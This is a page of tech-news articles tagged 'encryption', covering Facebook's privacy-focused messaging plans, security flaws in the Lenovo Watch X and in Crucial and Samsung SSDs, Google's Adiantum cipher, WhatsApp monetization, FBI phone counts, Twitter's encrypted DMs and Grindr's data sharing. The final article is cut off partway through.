encryption

Zuckerberg wants messages to auto-expire to make Facebook a ‘living room’

Posted by | Apps, encryption, end-to-end encryption, Facebook, facebook messenger, Facebook Policy, facebook privacy, instagram, Mark Zuckerberg, Mobile, Policy, privacy, Social, TC, WhatsApp | No Comments

On feed-based “broader social networks, where people can accumulate friends or followers until the services feel more public . . . it feels more like a town square than a more intimate space like a living room” Facebook CEO Mark Zuckerberg explained in a blog post today. With messaging, groups, and ephemeral stories as the fastest growing social features, Zuckerberg laid out why he’s rethinking Facebook as a private living room where people can be comfortable being themselves without fear of hackers, government spying, and embarrassment from old content — all without encryption allowing bad actors to hide their crimes.

Perhaps this will just be more lip service in a time of PR crisis for Facebook. But with the business imperative fueled by social networking’s shift away from permanent feed broadcasting, Facebook can espouse the philosophy of privacy while in reality servicing its shareholders and bottom line. It’s this alignment that actually spurs product change. We saw Facebook’s agility with last year’s realization that a misinformation- and hate-plagued platform wouldn’t survive long-term so it had to triple its security and moderation staff. And in 2017, recognizing the threat of Stories, it implemented them across its apps. Now Facebook might finally see the dollar signs within privacy.

The New York Times’ Mike Isaac recently reported that Facebook planned to unify its Facebook, WhatsApp, and Instagram messaging infrastructure to allow cross-app messaging and end-to-end encryption. And Zuckerberg discussed this and the value of ephemerality on the recent earnings call. But now Zuckerberg has roadmapped a clearer slate of changes and policies to turn Facebook into a living room:

-Facebook will let users opt in to the ability to send or receive messages across Facebook, WhatsApp, and Instagram

-Facebook wants to expand that interoperability to SMS on Android

-Zuckerberg wants to make ephemerality automatic on messaging threads, so chats disappear by default after a month or year, with users able to control that or put timers on individual messages.

-Facebook plans to limit how long it retains metadata on messages once it’s no longer needed for spam or safety protections

-Facebook will extend end-to-end encryption across its messaging apps but use metadata and other non-content signals to weed out criminals using privacy to hide their misdeeds.

-Facebook won’t store data in countries with a bad track record of privacy abuse such as Russia, even if that means having to shut down or postpone operations in a country

You can read the full blog post from Zuckerberg below:

A Privacy-Focused Vision for Social Networking

My focus for the last couple of years has been understanding and addressing the biggest challenges facing Facebook. This means taking positions on important issues concerning the future of the internet. In this note, I’ll outline our vision and principles around building a privacy-focused messaging and social networking platform. There’s a lot to do here, and we’re committed to working openly and consulting with experts across society as we develop this.

Over the last 15 years, Facebook and Instagram have helped people connect with friends, communities, and interests in the digital equivalent of a town square. But people increasingly also want to connect privately in the digital equivalent of the living room. As I think about the future of the internet, I believe a privacy-focused communications platform will become even more important than today’s open platforms. Privacy gives people the freedom to be themselves and connect more naturally, which is why we build social networks.

Today we already see that private messaging, ephemeral stories, and small groups are by far the fastest growing areas of online communication. There are a number of reasons for this. Many people prefer the intimacy of communicating one-on-one or with just a few friends. People are more cautious of having a permanent record of what they’ve shared. And we all expect to be able to do things like payments privately and securely.

Public social networks will continue to be very important in people’s lives — for connecting with everyone you know, discovering new people, ideas and content, and giving people a voice more broadly. People find these valuable every day, and there are still a lot of useful services to build on top of them. But now, with all the ways people also want to interact privately, there’s also an opportunity to build a simpler platform that’s focused on privacy first.

I understand that many people don’t think Facebook can or would even want to build this kind of privacy-focused platform — because frankly we don’t currently have a strong reputation for building privacy protective services, and we’ve historically focused on tools for more open sharing. But we’ve repeatedly shown that we can evolve to build the services that people really want, including in private messaging and stories.

I believe the future of communication will increasingly shift to private, encrypted services where people can be confident what they say to each other stays secure and their messages and content won’t stick around forever. This is the future I hope we will help bring about.

We plan to build this the way we’ve developed WhatsApp: focus on the most fundamental and private use case — messaging — make it as secure as possible, and then build more ways for people to interact on top of that, including calls, video chats, groups, stories, businesses, payments, commerce, and ultimately a platform for many other kinds of private services.

This privacy-focused platform will be built around several principles:

Private interactions. People should have simple, intimate places where they have clear control over who can communicate with them and confidence that no one else can access what they share.

Encryption. People’s private communications should be secure. End-to-end encryption prevents anyone — including us — from seeing what people share on our services.

Permanence. People should be comfortable being themselves, and should not have to worry about what they share coming back to hurt them later. So we won’t keep messages or stories around for longer than necessary to deliver the service or longer than people want it.

Safety. People should expect that we will do everything we can to keep them safe on our services within the limits of what’s possible in an encrypted service.

Interoperability. People should be able to use any of our apps to reach their friends, and they should be able to communicate across networks easily and securely.

Secure data storage. People should expect that we won’t store sensitive data in countries with weak records on human rights like privacy and freedom of expression in order to protect data from being improperly accessed.

Over the next few years, we plan to rebuild more of our services around these ideas. The decisions we’ll face along the way will mean taking positions on important issues concerning the future of the internet. We understand there are a lot of tradeoffs to get right, and we’re committed to consulting with experts and discussing the best way forward. This will take some time, but we’re not going to develop this major change in our direction behind closed doors. We’re going to do this as openly and collaboratively as we can because many of these issues affect different parts of society.

Private Interactions as a Foundation

For a service to feel private, there must never be any doubt about who you are communicating with. We’ve worked hard to build privacy into all our products, including those for public sharing. But one great property of messaging services is that even as your contacts list grows, your individual threads and groups remain private. As your friends evolve over time, messaging services evolve gracefully and remain intimate.

This is different from broader social networks, where people can accumulate friends or followers until the services feel more public. This is well-suited to many important uses — telling all your friends about something, using your voice on important topics, finding communities of people with similar interests, following creators and media, buying and selling things, organizing fundraisers, growing businesses, or many other things that benefit from having everyone you know in one place. Still, when you see all these experiences together, it feels more like a town square than a more intimate space like a living room.

There is an opportunity to build a platform that focuses on all of the ways people want to interact privately. This sense of privacy and intimacy is not just about technical features — it is designed deeply into the feel of the service overall. In WhatsApp, for example, our team is obsessed with creating an intimate environment in every aspect of the product. Even where we’ve built features that allow for broader sharing, it’s still a less public experience. When the team built groups, they put in a size limit to make sure every interaction felt private. When we shipped stories on WhatsApp, we limited public content because we worried it might erode the feeling of privacy to see lots of public content — even if it didn’t actually change who you’re sharing with.

In a few years, I expect future versions of Messenger and WhatsApp to become the main ways people communicate on the Facebook network. We’re focused on making both of these apps faster, simpler, more private and more secure, including with end-to-end encryption. We then plan to add more ways to interact privately with your friends, groups, and businesses. If this evolution is successful, interacting with your friends and family across the Facebook network will become a fundamentally more private experience.

Encryption and Safety

People expect their private communications to be secure and to only be seen by the people they’ve sent them to — not hackers, criminals, over-reaching governments, or even the people operating the services they’re using.

There is a growing awareness that the more entities that have access to your data, the more vulnerabilities there are for someone to misuse it or for a cyber attack to expose it. There is also a growing concern among some that technology may be centralizing power in the hands of governments and companies like ours. And some people worry that our services could access their messages and use them for advertising or in other ways they don’t expect.

End-to-end encryption is an important tool in developing a privacy-focused social network. Encryption is decentralizing — it limits services like ours from seeing the content flowing through them and makes it much harder for anyone else to access your information. This is why encryption is an increasingly important part of our online lives, from banking to healthcare services. It’s also why we built end-to-end encryption into WhatsApp after we acquired it.

In the last year, I’ve spoken with dissidents who’ve told me encryption is the reason they are free, or even alive. Governments often make unlawful demands for data, and while we push back and fight these requests in court, there’s always a risk we’ll lose a case — and if the information isn’t encrypted we’d either have to turn over the data or risk our employees being arrested if we failed to comply. This may seem extreme, but we’ve had a case where one of our employees was actually jailed for not providing access to someone’s private information even though we couldn’t access it since it was encrypted.

At the same time, there are real safety concerns to address before we can implement end-to-end encryption across all of our messaging services. Encryption is a powerful tool for privacy, but that includes the privacy of people doing bad things. When billions of people use a service to connect, some of them are going to misuse it for truly terrible things like child exploitation, terrorism, and extortion. We have a responsibility to work with law enforcement and to help prevent these wherever we can. We are working to improve our ability to identify and stop bad actors across our apps by detecting patterns of activity or through other means, even when we can’t see the content of the messages, and we will continue to invest in this work. But we face an inherent tradeoff because we will never find all of the potential harm we do today when our security systems can see the messages themselves.

Finding the right ways to protect both privacy and safety is something societies have historically grappled with. There are still many open questions here and we’ll consult with safety experts, law enforcement and governments on the best ways to implement safety measures. We’ll also need to work together with other platforms to make sure that as an industry we get this right. The more we can create a common approach, the better.

On balance, I believe working towards implementing end-to-end encryption for all private communications is the right thing to do. Messages and calls are some of the most sensitive private conversations people have, and in a world of increasing cyber security threats and heavy-handed government intervention in many countries, people want us to take the extra step to secure their most private data. That seems right to me, as long as we take the time to build the appropriate safety systems that stop bad actors as much as we possibly can within the limits of an encrypted service. We’ve started working on these safety systems building on the work we’ve done in WhatsApp, and we’ll discuss them with experts through 2019 and beyond before fully implementing end-to-end encryption. As we learn more from those experts, we’ll finalize how to roll out these systems.

Reducing Permanence

We increasingly believe it’s important to keep information around for shorter periods of time. People want to know that what they share won’t come back to hurt them later, and reducing the length of time their information is stored and accessible will help.

One challenge in building social tools is the “permanence problem”. As we build up large collections of messages and photos over time, they can become a liability as well as an asset. For example, many people who have been on Facebook for a long time have photos from when they were younger that could be embarrassing. But people also really love keeping a record of their lives. And if all posts on Facebook and Instagram disappeared, people would lose access to a lot of valuable knowledge and experiences others have shared.

I believe there’s an opportunity to set a new standard for private communication platforms — where content automatically expires or is archived over time. Stories already expire after 24 hours unless you archive them, and that gives people the comfort to share more naturally. This philosophy could be extended to all private content.

For example, messages could be deleted after a month or a year by default. This would reduce the risk of your messages resurfacing and embarrassing you later. Of course you’d have the ability to change the timeframe or turn off auto-deletion for your threads if you wanted. And we could also provide an option for you to set individual messages to expire after a few seconds or minutes if you wanted.

It also makes sense to limit the amount of time we store messaging metadata. We use this data to run our spam and safety systems, but we don’t always need to keep it around for a long time. An important part of the solution is to collect less personal data in the first place, which is the way WhatsApp was built from the outset.

Interoperability

People want to be able to choose which service they use to communicate with people. However, today if you want to message people on Facebook you have to use Messenger, on Instagram you have to use Direct, and on WhatsApp you have to use WhatsApp. We want to give people a choice so they can reach their friends across these networks from whichever app they prefer.

We plan to start by making it possible for you to send messages to your contacts using any of our services, and then to extend that interoperability to SMS too. Of course, this would be opt-in and you will be able to keep your accounts separate if you’d like.

There are privacy and security advantages to interoperability. For example, many people use Messenger on Android to send and receive SMS texts. Those texts can’t be end-to-end encrypted because the SMS protocol is not encrypted. With the ability to message across our services, however, you’d be able to send an encrypted message to someone’s phone number in WhatsApp from Messenger.

This could also improve convenience in many experiences where people use Facebook or Instagram as their social network and WhatsApp as their preferred messaging service. For example, lots of people selling items on Marketplace list their phone number so people can message them about buying it. That’s not ideal, because you’re giving strangers your phone number. With interoperability, you’d be able to use WhatsApp to receive messages sent to your Facebook account without sharing your phone number — and the buyer wouldn’t have to worry about whether you prefer to be messaged on one network or the other.

You can imagine many simple experiences — a person discovers a business on Instagram and easily transitions to their preferred messaging app for secure payments and customer support; another person wants to catch up with a friend and can send them a message that goes to their preferred app without having to think about where that person prefers to be reached; or you simply post a story from your day across both Facebook and Instagram and can get all the replies from your friends in one place.

You can already send and receive SMS texts through Messenger on Android today, and we’d like to extend this further in the future, perhaps including the new telecom RCS standard. However, there are several issues we’ll need to work through before this will be possible. First, Apple doesn’t allow apps to interoperate with SMS on their devices, so we’d only be able to do this on Android. Second, we’d need to make sure interoperability doesn’t compromise the expectation of encryption that people already have using WhatsApp. Finally, it would create safety and spam vulnerabilities in an encrypted system to let people send messages from unknown apps where our safety and security systems couldn’t see the patterns of activity.

These are significant challenges and there are many questions here that require further consultation and discussion. But if we can implement this, we can give people more choice to use their preferred service to securely reach the people they want.

Secure Data Storage

People want to know their data is stored securely in places they trust. Looking at the future of the internet and privacy, I believe one of the most important decisions we’ll make is where we’ll build data centers and store people’s sensitive data.

There’s an important difference between providing a service in a country and storing people’s data there. As we build our infrastructure around the world, we’ve chosen not to build data centers in countries that have a track record of violating human rights like privacy or freedom of expression. If we build data centers and store sensitive data in these countries, rather than just caching non-sensitive data, it could make it easier for those governments to take people’s information.

Upholding this principle may mean that our services will get blocked in some countries, or that we won’t be able to enter others anytime soon. That’s a tradeoff we’re willing to make. We do not believe storing people’s data in some countries is a secure enough foundation to build such important internet infrastructure on.

Of course, the best way to protect the most sensitive data is not to store it at all, which is why WhatsApp doesn’t store any encryption keys and we plan to do the same with our other services going forward.

But storing data in more countries also establishes a precedent that emboldens other governments to seek greater access to their citizen’s data and therefore weakens privacy and security protections for people around the world. I think it’s important for the future of the internet and privacy that our industry continues to hold firm against storing people’s data in places where it won’t be secure.

Next Steps

Over the next year and beyond, there are a lot more details and trade-offs to work through related to each of these principles. A lot of this work is in the early stages, and we are committed to consulting with experts, advocates, industry partners, and governments — including law enforcement and regulators — around the world to get these decisions right.

At the same time, working through these principles is only the first step in building out a privacy-focused social platform. Beyond that, significant thought needs to go into all of the services we build on top of that foundation — from how people do payments and financial transactions, to the role of businesses and advertising, to how we can offer a platform for other private services.

But these initial questions are critical to get right. If we do this well, we can create platforms for private sharing that could be even more important to people than the platforms we’ve already built to help people share and connect more openly.

Doing this means taking positions on some of the most important issues facing the future of the internet. As a society, we have an opportunity to set out where we stand, to decide how we value private communications, and who gets to decide how long and where data should be stored.

I believe we should be working towards a world where people can speak privately and live freely knowing that their information will only be seen by who they want to see it and won’t all stick around forever. If we can help move the world in this direction, I will be proud of the difference we’ve made.

Powered by WPeMatico

Lenovo Watch X was riddled with security bugs, researcher says

Posted by | api, Bluetooth, China, computer security, computing, encryption, Gadgets, lenovo, Password, smartwatches, spokesperson, Wearables, web server, Zhongguancun | No Comments

Lenovo’s Watch X was widely panned as “absolutely terrible.” As it turns out, so was its security.

The low-end $50 smartwatch was one of Lenovo’s cheapest smartwatches. Available only for the China market, anyone who wants one has to buy one directly from the mainland. Lucky for Erez Yalon, head of security research at Checkmarx, an application security testing company, he was given one from a friend. But it didn’t take him long to find several vulnerabilities that allowed him to change user’s passwords, hijack accounts and spoof phone calls.

Because the smartwatch wasn’t using any encryption to send data from the app to the server, Yalon said he was able to see his registered email address and password sent in plain text, as well as data about how he was using the watch, like how many steps he was taking.

“The entire API was unencrypted,” said Yalon in an email to TechCrunch. “All data was transferred in plain-text.”

The API that helps power the watch was easily abused, he found, allowing him to reset anyone’s password simply by knowing a person’s username. That could’ve given him access to anyone’s account, he said.

Not only that, he found that the watch was sharing his precise geolocation with a server in China. Given the watch’s exclusivity to China, it might not be a red flag to natives. But Yalon said the watch had “already pinpointed my location” before he had even registered his account.

Yalon’s research wasn’t just limited to the leaky API. He found that the Bluetooth-enabled smartwatch could also be manipulated from nearby, by sending crafted Bluetooth requests. Using a small script, he demonstrated how easy it was to spoof a phone call on the watch.

Using a similar malicious Bluetooth command, he could also set the alarm to go off — again and again. “The function allows adding multiple alarms, as often as every minute,” he said.

Lenovo didn’t have much to say about the vulnerabilities, besides confirming their existence.

“The Watch X was designed for the China market and is only available from Lenovo to limited sales channels in China,” said spokesperson Andrew Barron. “Our [security team] team has been working with the [original device manufacturer] that makes the watch to address the vulnerabilities identified by a researcher and all fixes are due to be completed this week.”

Yalon said that encrypting the traffic between the watch, the Android app and its web server would prevent snooping and help reduce manipulation.

“Fixing the API permissions eliminates the ability of malicious users to send commands to the watch, spoof calls, and set alarms,” he said.

Powered by WPeMatico

Google makes it easier for cheap phones and smart devices to encrypt your data

Posted by | adiantum, cryptography, encryption, Gadgets, Google, Mobile, Security, TC | No Comments

Encryption is an important part of the whole securing-your-data package, but it’s easy to underestimate the amount of complexity it adds to any service or device. One part of that is the amount of processing encryption takes — an amount that could be impractical on small or low-end devices. Google wants to change that with a highly efficient new method called Adiantum.

Here’s the problem. While encryption is in a way just transforming one block of data reversibly into another, that process is actually pretty complicated. Math needs to be done, data read and written and reread and rewritten and confirmed and hashed.

For a text message that’s not so hard. But if you have to do the same thing as you store or retrieve megabyte after megabyte of data, for instance with images or video, that extra computation adds up quick.

Lots of modern smartphones and other gadgets are equipped with a special chip that performs some of the most common encryption algorithms and processes (namely AES), just like we have GPUs to handle graphics calculations in games and such.

But what about older phones, or cheaper ones, or tiny smart home gadgets that don’t have room for that kind of thing on their boards? Just like they can’t run the latest games, they might not be able to efficiently run the latest cryptographic processes. They can still encrypt things, of course, but it might take too long for certain apps to work, or drain the battery.

Google, clearly interested in keeping cheap phones competitive, is tackling this problem by creating a special encryption method just for low-power phones. They call it Adiantum, and it will be optionally part of Android distributions going forward.

The technical details are all here, but the gist is this. Instead of using AES it relies on a cipher called ChaCha. This cipher method is highly optimized for basic binary operations, which any processor can execute quickly, though of course it will be outstripped by specialized hardware and drivers. It’s well documented and already in use lots of places — this isn’t some no-name bargain bin code. As they show, it performs way better on earlier chipsets like the Cortex A7.

The Adiantum process doesn’t increase or decrease the size of the payload (for instance by padding it or by appending some header or footer data), meaning the same number of bytes come in as go out. That’s nice when you’re a file system and don’t want to have to set aside too many special blocks for encryption metadata and the like.

Naturally new encryption techniques are viewed with some skepticism by security professionals, for whom the greatest pleasure in life is to prove one is compromised or unreliable. Adiantum’s engineers say they have “high confidence in its security,” with the assumption (currently reasonable) that its component “primitives” ChaCha and AES are themselves secure. We’ll soon see!

In the meantime don’t expect any instant gains, but future low-power devices may offer better security without having to use more expensive components — you won’t have to do a thing, either.

Oh, and in case you were wondering:

Adiantum is named after the genus of the maidenhair fern, which in the Victorian language of flowers (floriography) represents sincerity and discretion.

Powered by WPeMatico

Security researchers have busted the encryption in several popular Crucial and Samsung SSDs

Posted by | cryptography, disk encryption, encryption, Gadgets, hardware, open source software, Samsung Electronics, Security, solid state drive | No Comments

Researchers at Radboud University have found critical security flaws in several popular Crucial and Samsung solid state drives (SSDs), which they say can be easily exploited to recover encrypted data without knowing the password.

The researchers, who detailed their findings in a new paper out Monday, reverse engineered the firmware of several drives to find a “pattern of critical issues” across the device makers.

In the case of one drive, the master password used to decrypt the drive’s data was just an empty string and could be easily exploiting by flipping a single bit in the drive’s memory. Another drive could be unlocked with “any password” by crippling the drive’s password validation checks.

That wouldn’t be much of a problem if an affected drive also used software encryption to secure its data. But the researchers found that in the case of Windows computers, often the default policy for BitLocker’s software-based drive encryption is to trust the drive — and therefore rely entirely on a device’s hardware encryption to protect the data. Yet, as the researchers found, if the hardware encryption is buggy, BitLocker isn’t doing much to prevent data theft.

In other words, users “should not rely solely on hardware encryption as offered by SSDs for confidentiality,” the researchers said.

Alan Woodward, a professor at the University of Surrey, said that the greatest risk to users is the drive’s security “failing silently.”

“You might think you’ve done the right thing enabling BitLocker but then a third-party fault undermines your security, but you never know and never would know,” he said.

Matthew Green, a cryptography professor at Johns Hopkins, described the BitLocker flaw in a tweet as “like jumping out of a plane with an umbrella instead of a parachute.”

The researchers said that their findings are not yet finalized — pending a peer review. But the research was made public after disclosing the bugs to the drive makers in April.

Crucial’s MX100, MX200 and MX300 drives, Samsung’s T3 and T5 USB external disks and Samsung 840 EVO and 850 EVO internal hard disks are known to be affected, but the researchers warned that many other drives may also be at risk.

The researchers criticized the device makers’ proprietary and closed-source cryptography that they said — and proved — is “often shown to be much weaker in practice” than their open-source and auditable cryptographic libraries. “Manufacturers that take security seriously should publish their crypto schemes and corresponding code so that security claims can be independently verified,” they wrote.

The researchers recommend using software-based encryption, like the open-source software VeraCrypt.

In an advisory, Samsung also recommended that users install encryption software to prevent any “potential breach of self-encrypting SSDs.” Crucial’s owner Micron is said to have a fix on the way, according to an advisory by the Netherlands’ National Cyber Security Center, but did not say when.

Micron did not immediately respond to a request for comment.

Powered by WPeMatico

Facebook’s ex-CSO, Alex Stamos, defends its decision to inject ads in WhatsApp

Posted by | Advertising Tech, Alex Stamos, Android, Apple, Apps, Brian Acton, e2e encryption, encryption, Facebook, Instant Messaging, Jan Koum, privacy, Sheryl Sandberg, signal foundation, Signal Protocol, Social, social media, WhatsApp | No Comments

Alex Stamos, Facebook’s former chief security officer, who left the company this summer to take up a role in academia, has made a contribution to what’s sometimes couched as a debate about how to monetize (and thus sustain) commercial end-to-end encrypted messaging platforms in order that the privacy benefits they otherwise offer can be as widely spread as possible.

Stamos made the comments via Twitter, where he said he was indirectly responding to the fallout from a Forbes interview with WhatsApp co-founder Brian Acton — in which Acton hit at out at his former employer for being greedy in its approach to generating revenue off of the famously anti-ads messaging platform.

Both WhatsApp founders’ exits from Facebook has been blamed on disagreements over monetization. (Jan Koum left some months after Acton.)

In the interview, Acton said he suggested Facebook management apply a simple business model atop WhatsApp, such as metered messaging for all users after a set number of free messages. But that management pushed back — with Facebook COO Sheryl Sandberg telling him they needed a monetization method that generates greater revenue “scale”.

And while Stamos has avoided making critical remarks about Acton (unlike some current Facebook staffers), he clearly wants to lend his weight to the notion that some kind of trade-off is necessary in order for end-to-end encryption to be commercially viable (and thus for the greater good (of messaging privacy) to prevail); and therefore his tacit support to Facebook and its approach to making money off of a robustly encrypted platform.

Stamos’ own departure from the fb mothership was hardly under such acrimonious terms as Acton, though he has had his own disagreements with the leadership team — as set out in a memo he sent earlier this year that was obtained by BuzzFeed. So his support for Facebook combining e2e and ads perhaps counts for something, though isn’t really surprising given the seat he occupied at the company for several years, and his always fierce defence of WhatsApp encryption.

(Another characteristic concern that also surfaces in Stamos’ Twitter thread is the need to keep the technology legal, in the face of government attempts to backdoor encryption, which he says will require “accepting the inevitable downsides of giving people unfettered communications”.)

I don’t want to weigh into the personal side of the WhatsApp vs Facebook fight, as there are people I respect on both sides, but I do want to use this as an opportunity to talk about the future of end-to-end encryption. (1/13)

— Alex Stamos (@alexstamos) September 26, 2018

This summer Facebook confirmed that, from next year, ads will be injected into WhatsApp statuses (aka the app’s Stories clone). So it is indeed bringing ads to the famously anti-ads messaging platform.

For several years the company has also been moving towards positioning WhatsApp as a business messaging platform to connect companies with potential customers — and it says it plans to meter those messages, also from next year.

So there are two strands to its revenue generating playbook atop WhatsApp’s e2e encrypted messaging platform. Both with knock-on impacts on privacy, given Facebook targets ads and marketing content by profiling users by harvesting their personal data.

This means that while WhatsApp’s e2e encryption means Facebook literally cannot read WhatsApp users’ messages, it is ‘circumventing’ the technology (for ad-targeting purposes) by linking accounts across different services it owns — using people’s digital identities across its product portfolio (and beyond) as a sort of ‘trojan horse’ to negate the messaging privacy it affords them on WhatsApp.

Facebook is using different technical methods (including the very low-tech method of phone number matching) to link WhatsApp user and Facebook accounts. Once it’s been able to match a Facebook user to a WhatsApp account it can then connect what’s very likely to be a well fleshed out Facebook profile with a WhatsApp account that nonetheless contains messages it can’t read. So it’s both respecting and eroding user privacy.

This approach means Facebook can carry out its ad targeting activities across both messaging platforms (as it will from next year). And do so without having to literally read messages being sent by WhatsApp users.

As trade offs go, it’s a clearly a big one — and one that’s got Facebook into regulatory trouble in Europe.

It is also, at least in Stamos’ view, a trade off that’s worth it for the ‘greater good’ of message content remaining strongly encrypted and therefore unreadable. Even if Facebook now knows pretty much everything about the sender, and can access any unencrypted messages they sent using its other social products.

In his Twitter thread Stamos argues that “if we want that right to be extended to people around the world, that means that E2E encryption needs to be deployed inside of multi-billion user platforms”, which he says means: “We need to find a sustainable business model for professionally-run E2E encrypted communication platforms.”

On the sustainable business model front he argues that two models “currently fit the bill” — either Apple’s iMessage or Facebook-owned WhatsApp. Though he doesn’t go into any detail on why he believes only those two are sustainable.

He does say he’s discounting the Acton-backed alternative, Signal, which now operates via a not-for-profit (the Signal Foundation) — suggesting that rival messaging app is “unlikely to hit 1B users”.

In passing he also throws it out there that Signal is “subsidized, indirectly, by FB ads” — i.e. because Facebook pays a licensing fee for use of the underlying Signal Protocol used to power WhatsApp’s e2e encryption. (So his slightly shade-throwing subtext is that privacy purists are still benefiting from a Facebook sugardaddy.)

Then he gets to the meat of his argument in defence of Facebook-owned (and monetized) WhatsApp — pointing out that Apple’s sustainable business model does not reach every mobile user, given its hardware is priced at a premium. Whereas WhatsApp running on a cheap Android handset ($50 or, perhaps even $30 in future) can.

Other encrypted messaging apps can also of course run on Android but presumably Stamos would argue they’re not professionally run.

“I think it is easy to underestimate how radical WhatsApp’s decision to deploy E2E was,” he writes. “Acton and Koum, with Zuck’s blessing, jumped off a bridge with the goal of building a monetization parachute on the way down. FB has a lot of money, so it was a very tall bridge, but it is foolish to expect that FB shareholders are going to subsidize a free text/voice/video global communications network forever. Eventually, WhatsApp is going to need to generate revenue.

“This could come from directly charging for the service, it could come from advertising, it could come from a WeChat-like services play. The first is very hard across countries, the latter two are complicated by E2E.”

“I can’t speak to the various options that have been floated around, or the arguments between WA and FB, but those of us who care about privacy shouldn’t see WhatsApp monetization as something evil,” he adds. “In fact, we should want WA to demonstrate that E2E and revenue are compatible. That’s the only way E2E will become a sustainable feature of massive, non-niche technology platforms.”

Stamos is certainly right that Apple’s iMessage cannot reach every mobile user, given the premium cost of Apple hardware.

Though he elides the important role that second hand Apple devices play in helping to reduce the barrier to entry to Apple’s pro-privacy technology — a role Apple is actively encouraging via support for older devices (and by its own services business expansion which extends its model so that support for older versions of iOS (and thus secondhand iPhones) is also commercially sustainable).

Robust encryption only being possible via multi-billion user platforms essentially boils down to a usability argument by Stamos — which is to suggest that mainstream app users will simply not seek encryption out unless it’s plated up for them in a way they don’t even notice it’s there.

The follow on conclusion is then that only a well-resourced giant like Facebook has the resources to maintain and serve this different tech up to the masses.

There’s certainly substance in that point. But the wider question is whether or not the privacy trade offs that Facebook’s monetization methods of WhatsApp entail, by linking Facebook and WhatsApp accounts and also, therefore, looping in various less than transparent data-harvest methods it uses to gather intelligence on web users generally, substantially erodes the value of the e2e encryption that is now being bundled with Facebook’s ad targeting people surveillance. And so used as a selling aid for otherwise privacy eroding practices.

Yes WhatsApp users’ messages will remain private, thanks to Facebook funding the necessary e2e encryption. But the price users are having to pay is very likely still their personal privacy.

And at that point the argument really becomes about how much profit a commercial entity should be able to extract off of a product that’s being marketed as securely encrypted and thus ‘pro-privacy’? How much revenue “scale” is reasonable or unreasonable in that scenario?

Other business models are possible, which was Acton’s point. But likely less profitable. And therein lies the rub where Facebook is concerned.

How much money should any company be required to leave on the table, as Acton did when he left Facebook without the rest of his unvested shares, in order to be able to monetize a technology that’s bound up so tightly with notions of privacy?

Acton wanted Facebook to agree to make as much money as it could without users having to pay it with their privacy. But Facebook’s management team said no. That’s why he’s calling them greedy.

Stamos doesn’t engage with that more nuanced point. He just writes: “It is foolish to expect that FB shareholders are going to subsidize a free text/voice/video global communications network forever. Eventually, WhatsApp is going to need to generate revenue” — thereby collapsing the revenue argument into an all or nothing binary without explaining why it has to be that way.

Powered by WPeMatico

FBI reportedly overestimated inaccessible encrypted phones by thousands

Posted by | encryption, FBI, Gadgets, Government, Mobile, privacy, Security | No Comments

The FBI seems to have been caught fibbing again on the topic of encrypted phones. FBI director Christopher Wray estimated in December that it had almost 7,800 phones from 2017 alone that investigators were unable to access. The real number is likely less than a quarter of that, The Washington Post reports.

Internal records cited by sources put the actual number of encrypted phones at perhaps 1,200 but perhaps as many as 2,000, and the FBI told the paper in a statement that “initial assessment is that programming errors resulted in significant over-counting of mobile devices reported.” Supposedly having three databases tracking the phones led to devices being counted multiple times.

Such a mistake would be so elementary that it’s hard to conceive of how it would be possible. These aren’t court notes, memos or unimportant random pieces of evidence, they’re physical devices with serial numbers and names attached. The idea that no one thought to check for duplicates before giving a number to the director for testimony in Congress suggests either conspiracy or gross incompetence.

The latter seems more likely after a report by the Office of the Inspector General that found the FBI had failed to utilize its own resources to access locked phones, instead suing Apple and then hastily withdrawing the case when its basis (a locked phone from a terror attack) was removed. It seems to have chosen to downplay or ignore its own capabilities in order to pursue the narrative that widespread encryption is dangerous without a backdoor for law enforcement.

An audit is underway at the Bureau to figure out just how many phones it actually has that it can’t access, and hopefully how this all happened.

It is unmistakably among the FBI’s goals to emphasize the problem of devices being fully encrypted and inaccessible to authorities, a trend known as “going dark.” That much it has said publicly, and it is a serious problem for law enforcement. But it seems equally unmistakable that the Bureau is happy to be sloppy, deceptive or both in its advancement of a tailored narrative.

Powered by WPeMatico

Twitter has an unlaunched ‘Secret’ encrypted messages feature

Posted by | Apps, encryption, Mobile, privacy, Security, Social, Twitter | No Comments

Buried inside Twitter’s Android app is a “Secret conversation” option that if launched would allow users to send encrypted direct messages. The feature could make Twitter a better home for sensitive communications that often end up on encrypted messaging apps like Signal, Telegram or WhatsApp.

The encrypted DMs option was first spotted inside the Twitter for Android application package (APK) by Jane Manchun Wong. APKs often contain code for unlaunched features that companies are quietly testing or will soon make available. A Twitter spokesperson declined to comment on the record. It’s unclear how long it might be before Twitter officially launches the feature, but at least we know it’s been built.

The appearance of encrypted DMs comes 18 months after whistleblower Edward Snowden asked Twitter CEO Jack Dorsey for the feature, which Dorsey said was “reasonable and something we’ll think about.”

Twitter has gone from “thinking about” the feature to prototyping it. The screenshot above shows the options to learn more about encrypted messaging, start a secret conversation and view both your own and your conversation partner’s encryption keys to verify a secure connection.

reasonable and something we’ll think about

— jack (@jack) December 14, 2016

Twitter’s DMs have become a powerful way for people to contact strangers without needing their phone number or email address. Whether it’s to send a reporter a scoop, warn someone of a problem, discuss business or just “slide into their DMs” to flirt, Twitter has established one of the most open messaging mediums. But without encryption, those messages are subject to snooping by governments, hackers or Twitter itself.

Twitter has long positioned itself as a facilitator of political discourse and even uprisings. But anyone seriously worried about the consequences of political dissonance, whistleblowing or leaking should be using an app like Signal that offers strong end-to-end encryption. Launching encrypted DMs could win back some of those change-makers and protect those still on Twitter.

Powered by WPeMatico

Grindr sends HIV status to third parties, and some personal data unencrypted

Posted by | Apps, encryption, grindr, Health, Mobile, privacy, Security | No Comments

Hot on the heels of last week’s security issues, dating app Grindr is under fire again for inappropriate sharing of HIV status with third parties (not advertisers, as I had written here before) and inadequate security on other personal data transmission. It’s not a good look for a company that says privacy is paramount.

Norwegian research outfit SINTEF analyzed the app’s traffic and found that HIV status, which users can choose to include in their profile, is included in packets sent to Apptimize and Localytics. Users are not informed that this data is being sent.

These aren’t advertising companies but rather services for testing and improving mobile apps — Grindr isn’t selling them this data or anything. The company’s CTO told BuzzFeed News that “the limited information shared with these platforms is done under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.” And to the best of my knowledge regulations like HIPAA don’t prevent the company from transmitting medical data provided voluntarily by users to third parties as specified in the privacy policy.

That said, it’s a rather serious breach of trust that something as private as HIV status is being shared in this way, even if it isn’t being done with any kind of ill intention. The laxity with which this extremely important and private information is handled undermines the message of care and consent that Grindr is careful to cultivate.

Update: Grindr’s head of security told Axios that the company will stop sending HIV status data to third parties.

Perhaps more serious from a systematic standpoint, however, is the unencrypted transmission of a great deal of sensitive data.

